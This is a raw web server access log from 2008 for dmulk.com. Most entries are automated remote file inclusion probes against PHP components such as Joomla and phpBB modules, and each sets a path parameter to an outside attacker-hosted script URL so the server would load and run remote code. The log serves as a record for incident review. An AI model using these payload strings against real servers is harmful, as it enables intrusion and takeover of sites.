200.63.42.136 - - [31/Aug/2008:10:54:09 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.0" 200 9435 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
200.63.42.136 - - [31/Aug/2008:10:54:10 -0700] "POST /blog/wp-comments-post.php HTTP/1.0" 302 1 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
190.56.164.90 - - [31/Aug/2008:10:54:12 -0700] "GET /logs/access_080117.log/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.56.164.90 - - [31/Aug/2008:10:54:13 -0700] "GET /logs/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.0" 200 62984 "-" "libwww-perl/5.803" "www.dmulk.com"
200.63.42.136 - - [31/Aug/2008:10:54:18 -0700] "POST /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.0" 404 8222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
190.56.164.90 - - [31/Aug/2008:10:54:18 -0700] "GET /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.0" 200 90000 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.192.212 - - [31/Aug/2008:10:54:19 -0700] "GET /logs/access_080322.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:54:21 -0700] "GET /logs/access_080806.log/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:54:23 -0700] "GET /?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89482 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:54:25 -0700] "GET /logs/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:54:36 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:54:36 -0700] "GET /logs/access_080728.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:54:36 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:54:37 -0700] "GET /logs/access_080412.log//index.php?place=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:54:38 -0700] "GET //index.php?place=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 200 89522 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:54:38 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:54:39 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:54:39 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:54:39 -0700] "GET /logs//index.php?place=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:54:50 -0700] "GET /logs/access_080510.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:54:56 -0700] "GET /logs/access_080122.log//?custompluginfile[]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:54:56 -0700] "GET /logs//?custompluginfile[]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 200 63005 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:54:56 -0700] "GET //?custompluginfile[]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 200 89552 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.55.113.226 - - [31/Aug/2008:10:54:59 -0700] "GET /logs/index1.php?site=http://albgroup.100megsfree8.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.55.113.226 - - [31/Aug/2008:10:54:59 -0700] "GET /index1.php?site=http://albgroup.100megsfree8.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:10:55:05 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:55:05 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:10:55:05 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:55:06 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
77.79.246.241 - - [31/Aug/2008:10:55:07 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 63005 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
77.79.246.241 - - [31/Aug/2008:10:55:08 -0700] "GET //?path%5Bdocroot%5D=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 89481 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:55:08 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89632 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:55:08 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89632 "-" "libwww-perl/5.812" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:55:11 -0700] "GET /logs/access_080614.log/index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:55:11 -0700] "GET /logs/access_080707.log/index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:55:12 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:55:14 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89616 "-" "libwww-perl/5.812" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:55:23 -0700] "GET /logs/access_080328.log//index.php?place=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [31/Aug/2008:10:55:23 -0700] "GET /logs/access_080813.log//index.php?view=page&pagename=http://www.forum.dietologam.ru/Themes/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [31/Aug/2008:10:55:23 -0700] "GET /logs//index.php?view=page&pagename=http://www.forum.dietologam.ru/Themes/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [31/Aug/2008:10:55:23 -0700] "GET /logs/access_080310.log//index.php?view=page&pagename=http://www.forum.dietologam.ru/Themes/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [31/Aug/2008:10:55:24 -0700] "GET //index.php?view=page&pagename=http://www.forum.dietologam.ru/Themes/oye.txt%0D?? HTTP/1.1" 200 8118 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [31/Aug/2008:10:55:25 -0700] "GET /logs/access_080609.log%20//config/dbutil.bck.php?confdir=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.225.135 - - [31/Aug/2008:10:55:30 -0700] "GET /logs/access_080806.log/index.php?content=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:55:36 -0700] "GET /logs/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:55:36 -0700] "GET /errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.225.135 - - [31/Aug/2008:10:55:36 -0700] "GET /logs/index.php?content=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:55:40 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:55:43 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89616 "-" "libwww-perl/5.812" "www.dmulk.com"
210.48.67.39 - - [31/Aug/2008:10:55:43 -0700] "GET /logs//index.php?view=page&pagename=http://www.forum.dietologam.ru/Themes/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.225.135 - - [31/Aug/2008:10:55:44 -0700] "GET /index.php?content=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 200 89467 "-" "libwww-perl/5.811" "www.dmulk.com"
210.48.67.39 - - [31/Aug/2008:10:55:44 -0700] "GET //index.php?view=page&pagename=http://www.forum.dietologam.ru/Themes/oye.txt%0D?? HTTP/1.1" 200 8118 "-" "libwww-perl/5.805" "www.dmulk.com"
195.199.190.37 - - [31/Aug/2008:10:55:46 -0700] "GET /logs/access_080727.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:55:46 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
195.199.190.37 - - [31/Aug/2008:10:55:48 -0700] "GET /logs/access_080812.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:55:48 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89616 "-" "libwww-perl/5.812" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:55:52 -0700] "GET /logs/access_080806.log/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:55:53 -0700] "GET /?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89482 "-" "libwww-perl/5.811" "www.dmulk.com"
59.126.46.141 - - [31/Aug/2008:10:55:53 -0700] "GET /logs/access_080422.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:55:55 -0700] "GET /logs/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.811" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:10:56:16 -0700] "GET /logs/access_080808.log//popup_window.php?site_isp_root=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:10:56:16 -0700] "GET /logs/access_080808.log//popup_window.php?site_isp_root=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:10:56:16 -0700] "GET //popup_window.php?site_isp_root=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:10:56:16 -0700] "GET //popup_window.php?site_isp_root=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:10:56:17 -0700] "GET /logs//popup_window.php?site_isp_root=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:10:56:17 -0700] "GET /logs//popup_window.php?site_isp_root=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:56:23 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:56:24 -0700] "GET //components/errors.php?error=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:56:24 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:56:24 -0700] "GET /logs/access_080226.log//modules/errors.php?error=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:56:24 -0700] "GET //modules/errors.php?error=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:56:24 -0700] "GET //modules/errors.php?error=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:56:24 -0700] "GET /logs//modules/errors.php?error=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:10:56:25 -0700] "GET /logs/access_080712.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:10:56:26 -0700] "GET /logs/access_080523.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:10:56:28 -0700] "GET /logs//?custompluginfile[]=http://www.islandrejuvacations.com/calendar/id.txt? HTTP/1.1" 200 63005 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:56:28 -0700] "GET /logs/access_080226.log//components/errors.php?error=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:56:28 -0700] "GET //components/errors.php?error=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:56:29 -0700] "GET /logs//components/errors.php?error=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:56:29 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:10:56:29 -0700] "GET //?custompluginfile[]=http://www.islandrejuvacations.com/calendar/id.txt? HTTP/1.1" 200 89577 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:56:30 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:56:30 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:56:44 -0700] "GET /logs/access_080708.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:56:44 -0700] "GET /logs/access_080601.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:56:55 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:56:55 -0700] "GET /convert/mvcw.php?vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.32.96.7 - - [31/Aug/2008:10:57:06 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.chakde.net/orca/js/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.32.96.7 - - [31/Aug/2008:10:57:06 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.chakde.net/orca/js/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:57:09 -0700] "GET /logs/access_080207.log//modules/errors.php?error=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:57:09 -0700] "GET /logs//index.php?place=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:57:10 -0700] "GET //index.php?place=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 200 89506 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:57:13 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:57:18 -0700] "GET /logs/access_080730.log///vwar/backup/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:57:18 -0700] "GET ///vwar/backup/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:57:18 -0700] "GET /logs///vwar/backup/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:10:57:38 -0700] "GET /logs/access_080410.log/inc/header.php/step_one.php?server_inc=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:10:57:39 -0700] "GET /?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89482 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:10:57:42 -0700] "GET /logs/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.65" "www.dmulk.com"
190.56.164.90 - - [31/Aug/2008:10:57:56 -0700] "GET /logs/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.0" 200 62984 "-" "libwww-perl/5.803" "www.dmulk.com"
190.56.164.90 - - [31/Aug/2008:10:57:58 -0700] "GET /logs/access_071203.log/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:58:11 -0700] "GET /logs/access_080625.log/includes/messages.inc.php?include_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:58:11 -0700] "GET /includes/messages.inc.php?include_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:58:11 -0700] "GET /logs/includes/messages.inc.php?include_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:10:58:43 -0700] "GET /logs/access_080126.log/modules/My_eGallery/index.php?basepath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:10:58:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:10:58:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:10:58:56 -0700] "GET /logs/access_080225.log/modules/My_eGallery/index.php?basepath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.128.122.28 - - [31/Aug/2008:10:59:04 -0700] "GET //popup_window.php?site_isp_root=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.128.122.28 - - [31/Aug/2008:10:59:04 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:59:16 -0700] "GET /logs/access_080628.log/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:59:16 -0700] "GET /?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 89732 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:59:17 -0700] "GET /logs/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 63000 "-" "libwww-perl/5.811" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:10:59:23 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:10:59:28 -0700] "GET /logs/access_080407.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:10:59:29 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:10:59:29 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:10:59:29 -0700] "GET /logs/access_080126.log/modules/My_eGallery/index.php?basepath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:10:59:29 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:10:59:30 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
